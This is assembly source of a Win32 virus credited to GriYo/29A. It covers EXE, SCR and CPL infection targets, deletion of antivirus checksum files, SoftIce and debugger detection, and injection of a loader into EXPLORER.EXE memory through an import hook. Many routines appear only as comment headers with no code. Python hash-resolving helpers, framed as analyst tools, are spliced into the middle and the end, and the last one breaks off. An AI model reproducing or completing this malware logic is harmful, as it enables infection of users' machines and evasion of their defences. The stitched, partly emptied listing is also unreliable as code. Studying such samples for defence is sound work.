extrn GetModuleHandleA:NEAR
extrn Sleep:NEAR
;============================================================================
;Fake host used for virus 1st generation
;============================================================================
;============================================================
;We need the CRC lookup table for the next steps
;============================================================
;============================================================
;Save the CRC32 of 'KERNEL32.DLL' inside virus body
;============================================================
;============================================================
;Save the CRC32 of 'GetProcAddress' inside virus body
;============================================================
;============================================================
;Save the CRC32 of infectable file extensions
;============================================================
;============================================================
;Save the CRC32 of some AV files
;============================================================
mov ecx,NumberOfAV
mov esi,offset g1_av_names
mov edi,offset TblCRC32AV
call save_crc_names
;============================================================
;Save the CRC32 of EXPLORER.EXE
;============================================================
;============================================================
;Save the CRC32 of 'USER32.DLL'
;============================================================
;============================================================
;Save the CRC32 of 'PSAPI.DLL'
;============================================================
;============================================================
;Save the CRC32 of 'IMAGEHLP.DLL'
;============================================================
;============================================================
;Save the CRC32 of 'SFC.DLL'
;============================================================
mov ecx,NumK32Apis
mov esi,offset namesK32Apis
mov edi,offset CRC32K32Apis
call save_crc_names
;============================================================
;These are some specially handled APIs
;============================================================
mov ecx,00000001h
mov esi,offset name_IsDebuggerPresent
mov edi,offset CRC32_IsDebugPr
call save_crc_names
;============================================================
;Get TOOLHELP APIs (Windows 9x only)
;============================================================
mov ecx,NumTOOLHELPApis
mov esi,offset namesTOOLHELPApis
mov edi,offset CRC32TOOLHELPApis
call save_crc_names
;============================================================
;Get PSAPI.DLL APIs (Windows Nt & Windows 2000 only)
;============================================================
mov ecx,NumPSAPIApis
mov esi,offset namesPSAPIApis
mov edi,offset CRC32PSAPIApis
call save_crc_names
;============================================================
;Get API used to compute image checksum
;============================================================
mov ecx,NumIMGHLPApis
mov esi,offset namesIMGHLPApis
mov edi,offset CRC32IMGHLPApis
call save_crc_names
;============================================================
;Get API used to check for Windows2000 System File Protection
;============================================================
mov ecx,NumSFCApis
mov esi,offset namesSFCApis
mov edi,offset CRC32SFCApis
call save_crc_names
;============================================================
;Get CRC32 of USER32 API names ( Ansi version )
;============================================================
mov ecx,NumUSER32Apis
mov esi,offset namesUSER32Apisw9x
mov edi,offset CRC32USER32Apisw9x
call save_crc_names
;============================================================
;Get CRC32 of USER32 API names ( Wide version )
;============================================================
mov ecx,NumUSER32Apis
mov esi,offset namesUSER32Apiswnt
mov edi,offset CRC32USER32Apiswnt
call save_crc_names
;============================================================
;Build the do-not-infect-file-by-name CRC32 table
;============================================================
mov ecx,avoid_num
mov esi,offset g1_avoid_files
mov edi,offset avoid_tbl
call save_crc_names
;============================================================
;Get KERNEL32.DLL module handle
;============================================================
call get1st_end
;============================================================
;Let the 1st generation host run
;============================================================
;============================================================
;Ready to jump into main virus body !!!!
;============================================================
xor ebp,ebp
jmp entry_1st_gen
;============================================================
;Routine that converts API names into CRC32 values
;============================================================
save_crc_names: cld
get_g1_crc: push ecx
lodsd
push esi
mov esi,eax
call get_str_crc32
mov eax,edx
stosd
pop esi
pop ecx
loop get_g1_crc
ret
_TEXT ends
;============================================================================
;Here comes the rest of the sections in virus 1st generation
;============================================================================
;============================================================
;Used to locate KERNEL32 base address on 1st generation
;============================================================
g1_szKernel32 db 'KERNEL32.DLL',00h
g1_szGetProcAddr db 'GetProcAddress',00h
;============================================================
;Used to check if file extension is infectable
;============================================================
g1_szEXE db '.EXE',00h
g1_szSCR db '.SCR',00h
g1_szCPL db '.CPL',00h
;============================================================
;This virus uses CRC32 instead of DLL names !!!!
;
;LoadLibrary requires the DLL name as parameter... but
;we can find the DLL name by browsing SYSTEM32 directory
;for a file whose CRC32 matches a given one
;============================================================
g1_szEXPLORER db 'EXPLORER.EXE',00h
g1_szUSER32 db 'USER32.DLL',00h
g1_szPSAPI db 'PSAPI.DLL',00h
g1_szIMGHLP db 'IMAGEHLP.DLL',00h
g1_szSFC db 'SFC.DLL',00h
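As an added analyst-side example (my code, not GriYo's and not part of the 29A source), here is a Python reimplementation of the table-driven CRC32 that make_crc_tbl, get_str_crc32 and save_crc_names apply to the DLL and API names listed above, inverted so that a hash pulled out of a sample can be resolved back to a name from this page's lists. It assumes the standard reflected CRC32 (polynomial 0xEDB88320, initial value 0xFFFFFFFF, final inversion) and that each name is hashed without its NUL terminator; all Python identifiers are mine.

```python
"""Added analyst-side helper (not from the 29A source): rebuild the
table-driven CRC32 a sample applies to DLL and API names, then invert it so
hashes pulled out of the sample can be resolved back to names."""
import zlib

# ASSUMPTION: the sample uses the standard reflected CRC32 (IEEE 802.3):
# polynomial 0xEDB88320, initial value 0xFFFFFFFF, final inversion, and
# names hashed up to (not including) their NUL terminator. A non-standard
# variant only needs these three constants changed.
CRC_POLY = 0xEDB88320
CRC_INIT = 0xFFFFFFFF
CRC_XOROUT = 0xFFFFFFFF


def make_crc_tbl():
    """256-entry lookup table, the Python equivalent of make_crc_tbl."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ CRC_POLY if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = make_crc_tbl()


def crc32_bytes(data):
    """Table-driven CRC32 over a byte string (one table lookup per byte)."""
    crc = CRC_INIT
    for b in data:
        crc = CRC_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ CRC_XOROUT


def crc32_str(name):
    """Hash an ASCII name as the sample's get_str_crc32 would (see ASSUMPTION)."""
    return crc32_bytes(name.encode("ascii"))


def matches_zlib(name):
    """Cross-check of the hand-rolled CRC32 against zlib's standard CRC32."""
    return crc32_str(name) == (zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF)


# Names copied from the g1_* tables on this page (a representative subset of
# the KERNEL32 list; extend it with the rest when resolving a full table).
DLL_NAMES = ["KERNEL32.DLL", "USER32.DLL", "PSAPI.DLL", "IMAGEHLP.DLL", "SFC.DLL"]
API_NAMES = [
    "GetProcAddress", "IsDebuggerPresent", "CreateFileA", "CreateFileMappingA",
    "CreateProcessA", "CreateThread", "CloseHandle", "DeleteFileA", "ExitThread",
    "FindFirstFileA", "FindNextFileA", "GetVersionExA", "LoadLibraryA",
    "MapViewOfFile", "OpenProcess", "ReadProcessMemory", "WriteProcessMemory",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameA",
    "SfcIsFileProtected", "CheckSumMappedFile", "DefWindowProcA", "DefWindowProcW",
]


def build_resolver(api_names, dll_names):
    """Map CRC32 -> name. Export names are case-sensitive and indexed as-is;
    DLL file names are case-insensitive on disk and the sample hashes them
    upper-case, so they are indexed upper-cased. Collisions are reported."""
    table = {}
    for name in list(api_names) + [d.upper() for d in dll_names]:
        h = crc32_str(name)
        if h in table and table[h] != name:
            raise ValueError(f"CRC32 collision: {table[h]!r} vs {name!r}")
        table[h] = name
    return table


RESOLVER = build_resolver(API_NAMES, DLL_NAMES)


def resolve(h):
    """Name for a 32-bit hash found in the sample, or None if unknown."""
    return RESOLVER.get(h & 0xFFFFFFFF)


def resolve_hash_list(hashes):
    """Annotate a dword table as read out of a sample: [(hash, name|None)]."""
    return [(h, resolve(h)) for h in hashes]


def dll_name_matches(disk_name):
    """Would this directory entry match one of the sample's hashed DLL names?
    Mirrors the SYSTEM32 scan: compare CRC32 of the upper-cased file name."""
    return crc32_str(disk_name.upper()) in {crc32_str(d) for d in DLL_NAMES}


if __name__ == "__main__":
    # Constructed example: three dwords as they might be read from a
    # sample's CRC32 table; the last one is a hash our lists do not cover.
    sample = [crc32_str("CreateFileA"), crc32_str("KERNEL32.DLL"), 0xDEADBEEF]
    for h, name in resolve_hash_list(sample):
        print(f"{h:08X} -> {name or '<unresolved>'}")
```

An unresolved entry is the signal to widen the name list (or to suspect a non-standard CRC variant, which matches_zlib will flag against a known name).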
;============================================================
;Do not infect files with these character combinations in
;their names
;============================================================
g1_avoid_files equ $
dd offset g1_avoid_00
dd offset g1_avoid_01
dd offset g1_avoid_02
dd offset g1_avoid_03
dd offset g1_avoid_04
dd offset g1_avoid_05
dd offset g1_avoid_06
dd offset g1_avoid_07
dd offset g1_avoid_08
dd offset g1_avoid_09
dd offset g1_avoid_0A
dd offset g1_avoid_0B
dd offset g1_avoid_0C
dd offset g1_avoid_0D
dd offset g1_avoid_0E
dd offset g1_avoid_0F
dd offset g1_avoid_10
dd offset g1_avoid_11
dd offset g1_avoid_12
dd offset g1_avoid_13
dd offset g1_avoid_14
dd offset g1_avoid_15
dd offset g1_avoid_16
dd offset g1_avoid_17
dd offset g1_avoid_18
g1_avoid_00 db 'DR',00h
g1_avoid_01 db 'PA',00h
g1_avoid_02 db 'RO',00h
g1_avoid_03 db 'VI',00h
g1_avoid_04 db 'AV',00h
g1_avoid_05 db 'TO',00h
g1_avoid_06 db 'CA',00h
g1_avoid_07 db 'IN',00h
g1_avoid_08 db 'MS',00h
g1_avoid_09 db 'SR',00h
g1_avoid_0A db 'SP',00h
g1_avoid_0B db 'RP',00h
g1_avoid_0C db 'PR',00h
g1_avoid_0D db 'NO',00h
g1_avoid_0E db 'CE',00h
g1_avoid_0F db 'LE',00h
g1_avoid_10 db 'MO',00h
g1_avoid_11 db 'SM',00h
g1_avoid_12 db 'DD',00h
g1_avoid_13 db 'SO',00h
g1_avoid_14 db 'SQ',00h
g1_avoid_15 db 'EX',00h
g1_avoid_16 db 'IE',00h
g1_avoid_17 db 'CM',00h
g1_avoid_18 db 'CO',00h
;============================================================
;Delete these AV files
;============================================================
g1_av_names equ $
dd offset g1_delete_00
dd offset g1_delete_01
dd offset g1_delete_02
dd offset g1_delete_03
dd offset g1_delete_04
g1_delete_00 db 'AVP.CRC',00h
g1_delete_01 db 'ANTI-VIR.DAT',00h
g1_delete_02 db 'CHKLIST.CPS',00h
g1_delete_03 db 'CHKLIST.MS',00h
g1_delete_04 db 'IVP.NTZ',00h
;============================================================
;KERNEL32.DLL API names
;
;Note that these tables and strings are not included in the
;virus body after the 1st generation, only CRC32 values
;============================================================
namesK32Apis equ $
dd offset g1_CreateFileA
dd offset g1_CreateFileMappingA
dd offset g1_CreateProcessA
dd offset g1_CreateThread
dd offset g1_CloseHandle
dd offset g1_DeleteFileA
dd offset g1_ExitThread
dd offset g1_FindClose
dd offset g1_FindFirstFileA
dd offset g1_FindNextFileA
dd offset g1_FreeLibrary
dd offset g1_GetComputerNameA
dd offset g1_GetCurrentProcess
dd offset g1_GetDriveTypeA
dd offset g1_GetFileAttributesA
dd offset g1_GetLastError
dd offset g1_GetLocalTime
dd offset g1_GetLogicalDriveStringsA
dd offset g1_GetSystemDirectoryA
dd offset g1_GetVersionEx
dd offset g1_LoadLibraryA
dd offset g1_MapViewOfFile
dd offset g1_OpenFileMappingA
dd offset g1_OpenProcess
dd offset g1_ReadProcessMemory
dd offset g1_SetEndOfFile
dd offset g1_SetFileAttributesA
dd offset g1_SetFilePointer
dd offset g1_SetFileTime
dd offset g1_Sleep
dd offset g1_UnmapViewOfFile
dd offset g1_WriteProcessMemory
g1_CreateFileA db 'CreateFileA',00h
g1_CreateFileMappingA db 'CreateFileMappingA',00h
g1_CreateProcessA db 'CreateProcessA',00h
g1_CreateThread db 'CreateThread',00h
g1_CloseHandle db 'CloseHandle',00h
g1_DeleteFileA db 'DeleteFileA',00h
g1_ExitThread db 'ExitThread',00h
g1_FindClose db 'FindClose',00h
g1_FindFirstFileA db 'FindFirstFileA',00h
g1_FindNextFileA db 'FindNextFileA',00h
g1_FreeLibrary db 'FreeLibrary',00h
g1_GetComputerNameA db 'GetComputerNameA',00h
g1_GetCurrentProcess db 'GetCurrentProcess',00h
g1_GetDriveTypeA db 'GetDriveTypeA',00h
g1_GetFileAttributesA db 'GetFileAttributesA',00h
g1_GetLastError db 'GetLastError',00h
g1_GetLocalTime db 'GetLocalTime',00h
g1_GetLogicalDriveStringsA db 'GetLogicalDriveStringsA',00h
g1_GetSystemDirectoryA db 'GetSystemDirectoryA',00h
g1_LoadLibraryA db 'LoadLibraryA',00h
g1_GetVersionEx db 'GetVersionExA',00h
g1_MapViewOfFile db 'MapViewOfFile',00h
g1_OpenFileMappingA db 'OpenFileMappingA',00h
g1_OpenProcess db 'OpenProcess',00h
g1_ReadProcessMemory db 'ReadProcessMemory',00h
g1_SetEndOfFile db 'SetEndOfFile',00h
g1_SetFileAttributesA db 'SetFileAttributesA',00h
g1_SetFilePointer db 'SetFilePointer',00h
g1_SetFileTime db 'SetFileTime',00h
g1_Sleep db 'Sleep',00h
g1_UnmapViewOfFile db 'UnmapViewOfFile',00h
g1_WriteProcessMemory db 'WriteProcessMemory',00h
;============================================================
;Special KERNEL32 APIs
;============================================================
g1_IsDebuggerPresent db 'IsDebuggerPresent',00h
;============================================================
;ToolHelp APIs
;============================================================
namesTOOLHELPApis equ $
dd offset g1_CreateToolhelp32Snapshot
dd offset g1_Process32First
dd offset g1_Process32Next
dd offset g1_Module32First
dd offset g1_Module32Next
g1_CreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',00h
g1_Process32First db 'Process32First',00h
g1_Process32Next db 'Process32Next',00h
g1_Module32First db 'Module32First',00h
g1_Module32Next db 'Module32Next',00h
;============================================================
;PSAPI.DLL API names
;============================================================
namesPSAPIApis equ $
dd offset g1_EnumProcessModules
dd offset g1_EnumProcesses
dd offset g1_GetModuleBaseNameA
dd offset g1_GetModuleInformation
g1_EnumProcessModules db 'EnumProcessModules',00h
g1_EnumProcesses db 'EnumProcesses',00h
g1_GetModuleBaseNameA db 'GetModuleBaseNameA',00h
g1_GetModuleInformation db 'GetModuleInformation',00h
;============================================================
;SFC.DLL API names
;============================================================
namesSFCApis equ $
dd offset g1_SfcIsFileProtected
g1_SfcIsFileProtected db 'SfcIsFileProtected',00h
;============================================================
;IMAGEHLP.DLL API names
;============================================================
namesIMGHLPApis equ $
dd offset g1_CheckSumMappedFile
g1_CheckSumMappedFile db 'CheckSumMappedFile',00h
;============================================================
;USER32.DLL API names (Ansi version)
;============================================================
namesUSER32Apisw9x equ $
dd offset g1w9x_DefWindowProc
g1w9x_DefWindowProc db 'DefWindowProcA',00h
;============================================================
;USER32.DLL API names (Wide version)
;============================================================
namesUSER32Apiswnt equ $
dd offset g1wnt_DefWindowProc
g1wnt_DefWindowProc db 'DefWindowProcW',00h
_DATA ends
_BSS ends
;============================================================================
;Viral section
;
;You have to understand that all the above-mentioned is not part of the virus
;This means that the text strings and other information previous to this
;point will be discarded
;============================================================================
;============================================================
;Get delta offset in ebp
;============================================================
;============================================================
;Create CRC32 lookup table... This virus uses CRC32 in lots
;of places along its code... Precalculated tables help to
;really speed up virus activity
;============================================================
call make_crc_tbl
;============================================================
;Check CRC32 of main virus body
;
; esi -> Ptr to buffer
; ecx -> Buffer size
;============================================================
mov ecx,SizeOfProtect
lea esi,dword ptr [ebp+CRC_protected]
call get_crc32
;============================================================
;Checksum matches?
;============================================================
cmp eax,edx
jne critical_error
CRC_protected equ $
;============================================================
;Scan system memory looking for KERNEL32.DLL
;============================================================
KernelScanning: pushad
fK32_try_01: mov eax,080000101h
call IGetNtBaseAddr
jecxz fK32_try_02
jmp short kernel_found
fK32_try_02: mov eax,0C0000101h
call IGetNtBaseAddr
jecxz fK32_try_03
jmp short kernel_found
fK32_try_03: xor eax,eax
call IGetNtBaseAddr
kernel_found: jecxz critical_error
mov dword ptr [esp.Pushad_ebx],ecx
popad
;============================================================
;This is the entry-point for 1st generation
;Now EBX points to KERNEL32.DLL base address
;============================================================
;============================================================
;Search for GetProcAddress entry-point
;============================================================
call GetGetProcAddr
jecxz critical_error
mov dword ptr [ebp+a_GetProcAddress],ecx
;============================================================
;Get KERNEL32 API addresses
;============================================================
mov ecx,NumK32Apis
lea esi,dword ptr [ebp+CRC32K32Apis]
lea edi,dword ptr [ebp+epK32Apis]
call get_APIs
jecxz RestoreHost
;============================================================
;Everything should work, but if something goes wrong this
;will halt the process
;============================================================
;============================================================
;Restore host code
;
;Make the return address point to the instruction which
;made the call
;============================================================
cld
lodsd
cmp eax,00000005h
jne critical_error
;============================================================
;Try to locate IsDebuggerPresent API
;============================================================
mov ecx,00000001h
lea esi,dword ptr [ebp+CRC32_IsDebugPr]
lea edi,dword ptr [ebp+a_IsDebuggerPresent]
call get_APIs
jecxz DetectDebug
;============================================================
;Check if the current process is running in the context of a
;debugger
;============================================================
;============================================================
;SoftIce lookup
;
;Code based on the article "Win32 Anti-Debugging tricks" by
;Billy Belcebu/iKX ( published on XINE#4 )
;============================================================
push ecx
push FILE_ATTRIBUTE_READONLY
push OPEN_EXISTING
push ecx
push FILE_SHARE_READ
push GENERIC_READ
call Get_szSIw9x
db '\\.\SICE',00h
push 00000000h
push FILE_ATTRIBUTE_READONLY
push OPEN_EXISTING
push 00000000h
push FILE_SHARE_READ
push GENERIC_READ
call Get_szSIwNT
db '\\.\NTICE',00h
;============================================================
;Get an object name based on the current host name
;============================================================
mov esi,edi
call get_str_crc32
mov eax,00003233h
stosd
mov al,cl
stosb
;============================================================
;Allocate shared memory
;
;MSDN says:
;
;"A shared file-mapping object will not be destroyed until
;all processes that use it close their handles to it by using
;the CloseHandle function."
;
;So the idea is to use CreateFileMapping and MapViewOfFile,
;instead of VirtualAlloc... Then open this file-mapping for
;reading from a small piece of code injected into
;EXPLORER.EXE
;============================================================
mov edi,eax
push edi
call dword ptr [ebp+a_CloseHandle]
jmp GoBack2Host
;============================================================
;Copy virus to allocated memory block
;============================================================
;============================================================
;Continue execution on allocated memory!!!!!!!!!
;
;This means we are able to use extended buffers...
;============================================================
;============================================================================
;Code executed in allocated memory... Extended buffers are available now
;============================================================================
;============================================================
;The virus needs to locate SYSTEM directory in order to load
;DLL's by using CRC32 instead of their names
;============================================================
push MAX_PATH
lea edi,dword ptr [ebp+szSYSTEMDIR]
push edi
call dword ptr [ebp+a_GetSystemDirectoryA]
or eax,eax
jz GoBack2Host
add edi,eax
cld
mov eax,'D.*\' ; Add '*.DLL'
stosd
mov eax,00004C4Ch
stosd
;============================================================
;Get OS version
;============================================================
cmp eax,VER_PLATFORM_WIN32_NT
je MemInfectWinNt
cmp eax,VER_PLATFORM_WIN32_WINDOWS
je MemInfectWin9x
;============================================================
;Free USER32
;============================================================
;============================================================
;Back to host
;============================================================
TblDoPolyPops equ $
ret
;============================================================================
;Residency routines for Windows 9x
;============================================================================
;============================================================
;Get hands on USER32.DLL
;============================================================
;============================================================
;The functions provided by the tool help library make it
;easier for you to obtain information about currently
;executing applications. These functions are designed to
;streamline the creation of Win32-hosted tools, specifically
;debuggers
;============================================================
mov ecx,NumTOOLHELPApis
lea esi,dword ptr [ebp+CRC32TOOLHELPApis]
lea edi,dword ptr [ebp+epTOOLHELPApis]
call get_APIs
jecxz DoneTOOLHELP
ExitMemWin9x: jmp FreeUSER32
;============================================================
;Take a snapshot of the processes currently loaded in the
;system
;
;The snapshot taken by the CreateToolhelp32Snapshot function
;is examined by the other tool help functions to provide
;their results
;
;Access to the snapshot is read only. The snapshot handle
;acts like an object handle and is subject to the same rules
;regarding which processes and threads it is valid in
;============================================================
;============================================================
;Retrieve information about the first process encountered
;in the system snapshot
;============================================================
mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CRCszEXPLORER] ;Is EXPLORER.EXE ?
je EFoundTryMod
;============================================================
;Go to next process
;============================================================
jmp ExitMemWin9x
;============================================================
;Close snapshot and create a new one, but this time we are
;going to list modules loaded by EXPLORER.EXE
;============================================================
;============================================================
;Perfect !!!! Let's retrieve 1st module using Module32First
;============================================================
;============================================================
;Check if this is the module we are interested in
;============================================================
;============================================================
;Go to next module
;============================================================
;============================================================
;Ohj0j0... Fine! Here we are with EXPLORER.EXE module handle
;============================================================
GetModDone: mov edx,dword ptr [ebp+ModEhModule]
mov dword ptr [ebp+hModule],edx
;============================================================
;Open process
;============================================================
;============================================================
;Duh! EXPLORER.EXE process is now 0wN3d
;============================================================
call FuckExplorer
;============================================================
;Close process
;============================================================
;============================================================================
;Residency routines for Windows NT & Windows 2000
;============================================================================
;============================================================
;Hands on USER32 apis for Windows NT (Use wide versions)
;============================================================
;============================================================
;We need PSAPI.DLL to do the trick
;============================================================
;============================================================
;Get a list of loaded processes (Max. 32 processes)
;============================================================
;============================================================
;To determine how many processes were enumerated by the call
;to EnumProcesses, divide the resulting value in the cbNeeded
;parameter by sizeof(DWORD)
;============================================================
;============================================================
;Now we have a list of process identifiers... Follow it
;============================================================
;============================================================
;Open process
;============================================================
call OpenProcess
or eax,eax
jz TryNextProcess
;============================================================
;Enumerate process modules... The 1st obtained module
;is the executable itself
;============================================================
cld
lodsd ;The first module is the .EXE itself
;============================================================
;Get module name using GetModuleBaseNameA API
;============================================================
;============================================================
;Module name is EXPLORER.EXE (use CRC32 comparison)
;============================================================
mov edi,esi
call parse_filename
mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CRCszEXPLORER] ;Is EXPLORER.EXE ?
jne NCProcess
;============================================================
;If EXPLORER.EXE found cleanup and go to the memory
;infection procedure
;============================================================
pop eax
pop eax
call FuckExplorer
;============================================================
;Close process
;============================================================
jmp ExitMemNt
;============================================================
;Try next process
;============================================================
;============================================================
;Residency proc failed!
;============================================================
;============================================================================
;Open process
;
;On entry:
; eax -> Process id
;On exit:
; eax -> Handle to process or NULL if error
;============================================================================
;============================================================================
;Infect EXPLORER.EXE in memory
;============================================================================
;============================================================
;Now search for the section header list
;============================================================
mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_MZ_lfanew]
mov eax,ebx
add eax,MZ_lfanew
call ReadProcessMem
or eax,eax
jz FE_Exit
add eax,ebx
mov edi,eax
add eax,00000004h + FH_SizeOfOptionalHeader
dec ecx
dec ecx
call ReadProcessMem
or eax,eax
jz FE_Exit
lodsw ;Just to do
;esi -> Explorer_FH_NumberOfSections
mov eax,edi
add eax,00000004h + FH_NumberOfSections
call ReadProcessMem
or eax,eax
jz FE_Exit
lodsw ;esi -> Explorer_SectionHeader
movzx ecx,ax ;ecx -> Number of sections
;============================================================
;Search for a suitable section
;============================================================
mov eax,edi
mov ecx,IMAGE_SIZEOF_SECTION_HEADER
call ReadProcessMem
or eax,eax
jz E_NextSection
;============================================================
;Is this a valid section?
;============================================================
cmp eax,SIZEOF_EVL
jae Ok_E_Section
;============================================================
;Try next section
;============================================================
;============================================================
;No suitable section found
;============================================================
jmp FE_Exit
;============================================================
;Yes, this is a valid section... Write virus loader
;============================================================
mov eax,ebx
add eax,dword ptr [esi+SH_VirtualAddress]
add eax,dword ptr [esi+SH_VirtualSize]
mov ecx,SIZEOF_EVL
lea esi,dword ptr [ebp+EVL_code]
call WriteProcessMem
or eax,eax
jz FE_Exit
;============================================================
;Go to EXPLORER.EXE data directory
;============================================================
mov eax,ebx
add eax,dword ptr [ebp+Explorer_MZ_lfanew]
add eax,00000004h + \
IMAGE_SIZEOF_FILE_HEADER + \
OH_DataDirectory.DE_Import.DD_VirtualAddress
mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_DE_Import]
call ReadProcessMem
or eax,eax
jz FE_Exit
;============================================================
;Search for USER32 import module descriptor
;============================================================
lodsd
add eax,ebx
mov edi,eax
;============================================================
;Last import module descriptor!?
;============================================================
;============================================================
;Check import module descriptor ID_Name
;============================================================
mov eax,ebx
add eax,dword ptr [esi+ID_Name]
mov ecx,00000010h
lea esi,dword ptr [ebp+Explorer_ID_Name]
call ReadProcessMem
or eax,eax
jz FE_Exit
push edi
pop edi
;============================================================
;Next import module descriptor
;============================================================
add edi,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
jmp E_Search_K32
;============================================================
;USER32.DLL import module descriptor found
;============================================================
add edi,ecx
jmp E_NextThunk
;============================================================
;Gotcha!
;============================================================
;============================================================
;Done!!!! ieieie!!!!
;============================================================
FE_Exit: ret
;============================================================================
;Code injected into EXPLORER.EXE
;
;The purpose of this code is to get access to virus memory from EXPLORER.EXE
;============================================================================
EVL_code equ $
;============================================================
;Leave some space for the return address... then save all regs
;============================================================
push eax
pushad
;============================================================
;This is the original address of the API... Let's make the
;return address point to it
;============================================================
;============================================================
;Attempt to avoid reentrance problems
;============================================================
call MultiThreadSafe
db 00h ;Only changed over hook code, not over main virus body
MultiThreadSafe:pop esi
mov edi,esi
cld
lodsb
or al,al
jnz MayBeOnNextCall
dec al
stosb
;============================================================
;Try to open the virus file-mapping
;
;There is some kinda race condition here... If the infected
;program terminates before this point we won't be able to
;find the rest of the virus in memory...
;
;In that case the hook will stay present, and this code may
;be able to find the virus memory-mapping on the next attempts
;============================================================
call eax
or eax,eax
jz MayBeOnNextCall
;============================================================
;The file-mapping is here... Get an image of it
;============================================================
xor edx,edx
push edx
push edx
push edx
push edi
push eax
call eax
or eax,eax
jz MayBeOnNextCall
;============================================================
;Great! We have access to virus allocated memory, but
;remember we are now inside EXPLORER.EXE !!!!
;
;Jump to virus complete image in order to complete
;initialization inside EXPLORER.EXE
;============================================================
;============================================================
;Restore regs and jump to original API code
;============================================================
MayBeOnNextCall:popad
ret
;============================================================================
;Read process memory routine
;
;On entry:
; eax -> Pointer to the base address from which to read
; ecx -> Specifies the requested number of bytes to read
; esi -> Pointer to a buffer that receives the contents from
; the address
;
; [ebp+hProcess] contains the target process handle
;
;On exit:
; eax -> NULL if error
;
; ebx, ecx, esi, edi, ebp preserved
;============================================================================
pop ecx
or eax,eax
jz ExitREM
xor eax,eax
;============================================================================
;Write process memory routine
;
;On entry:
; eax -> Pointer to the base address in the specified process
; to which data will be written
; ecx -> Specifies the number of bytes to write
; esi -> Pointer to the buffer that contains data to be written
;
; [ebp+hProcess] contains the target process handle
;
;On exit:
; eax -> NULL if error
;
; ebx, ecx, esi, edi, ebp preserved
;============================================================================
WriteProcessMem:push edi
push ecx
pop ecx
or eax,eax
jz ExitWEM
xor eax,eax
ExitWEM: pop edi
cld
ret
;============================================================================
;Make crc lookup table
;
;Generate a table for a byte-wise 32-bit CRC calculation on the polynomial:
;x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x+1.
;
;Polynomials over GF(2) are represented in binary, one bit per coefficient,
;with the lowest powers in the most significant bit. Then adding polynomials
;is just exclusive-or, and multiplying a polynomial by x is a right shift by
;one. If we call the above polynomial p, and represent a byte as the
;polynomial q, also with the lowest power in the most significant bit (so the
;byte 0xb1 is the polynomial x^7+x^3+x+1), then the CRC is (q*x^32) mod p,
;where a mod b means the remainder after dividing a by b.
;
;This calculation is done using the shift-register method of multiplying and
;taking the remainder. The register is initialized to zero, and for each
;incoming bit, x^32 is added mod p to the register if the bit is a one (where
;x^32 mod p is p+x^32 = x^26+...+1), and the register is multiplied mod p by
;x (which is shifting right by one and adding x^32 mod p if the bit shifted
;out is a one). We start with the highest power (least significant bit) of
;q and repeat for all eight bits of q.
;
;The table is simply the CRC of all possible eight bit values. This is all
;the information needed to generate CRC's on data a byte at a time for all
;combinations of CRC register values and incoming bytes.
;
;Original C code by Mark Adler
;Translated to asm for Win32 by GriYo
;============================================================================
make_crc_tbl:
;============================================================================
;Make exclusive-or pattern from polynomial (0EDB88320h)
;
;The following commented code is an example of how to
;make the exclusive-or pattern from polynomial
;at runtime
;
; xor edx,edx
; mov ecx,0000000Eh
; lea ebx,dword ptr [ebp+tbl_terms]
;calc_poly: mov eax,ecx
; xlatb
; sub eax,0000001Fh
; neg eax
; bts edx,eax
; loop calc_poly
;
; edx contains now the exclusive-or pattern
;
; The polynomial is:
;
; X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0
;
;tbl_terms db 0,1,2,4,5,7,8,10,11,12,16,22,23,26
;
;============================================================================
cld
mov ecx,00000100h
lea edi,dword ptr [ebp+tbl_crc32]
crc_tbl_do: mov eax,000000FFh
sub eax,ecx
push ecx
mov ecx,00000008h
make_crc_value: shr eax,01h
jnc next_value
xor eax,0EDB88320h
next_value: loop make_crc_value
pop ecx
stosd
loop crc_tbl_do
ret
;============================================================================
;Return a 32bit CRC of the contents of the buffer
;
;On entry:
; esi -> Ptr to buffer
; ecx -> Buffer size
;On exit:
; edx -> 32bit CRC
;============================================================================
get_crc32: cld
push edi
xor edx,edx
lea edi,dword ptr [ebp+tbl_crc32]
crc_calc: push ecx
lodsb
xor eax,edx
and eax,000000FFh
shr edx,08h
xor edx,dword ptr [edi+eax]
pop ecx
loop crc_calc
pop edi
ret
;============================================================================
;Get a 32bit CRC of a null terminated array
;
;On entry:
; esi -> Ptr to string
;Exit:
; edx -> 32bit CRC
;============================================================================
get_str_crc32: cld
push ecx
push edi
mov edi,esi
xor eax,eax
mov ecx,eax
crc_sz: inc ecx
scasb
jnz crc_sz
call get_crc32
pop edi
pop ecx
ret
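The table construction, get_crc32 and get_str_crc32 above, rewritten in Python as an added analysis aid (not part of the listing), so the CRC32 constants a sample carries in place of API names can be matched back to names from a candidate list the analyst supplies. Note that make_crc_tbl derives each entry index as 0FFh - ecx with ecx counting down from 100h, so its table is shifted by one relative to the standard table; the resolver therefore tries both layouts. The sample constant in the demo is constructed here.

```python
import zlib

# Reflected CRC-32 polynomial: the same 0EDB88320h constant the listing XORs in.
POLY = 0xEDB88320


def crc_entry(n: int) -> int:
    """Eight shift-and-conditional-XOR rounds: the inner make_crc_value loop."""
    c = n & 0xFFFFFFFF
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    return c


def make_crc_table(shifted: bool = False) -> list:
    """Byte-wise CRC-32 lookup table (Mark Adler's method).

    shifted=False builds the standard table.  shifted=True reproduces the
    layout the listing's make_crc_tbl actually builds: with ecx counting down
    from 100h, the index fed to the rounds is 0FFh - ecx, so entry 0 is
    computed from 0FFFFFFFFh and entry i (i >= 1) holds standard entry i - 1.
    """
    if shifted:
        return [crc_entry(0xFF - ecx) for ecx in range(0x100, 0, -1)]
    return [crc_entry(n) for n in range(256)]


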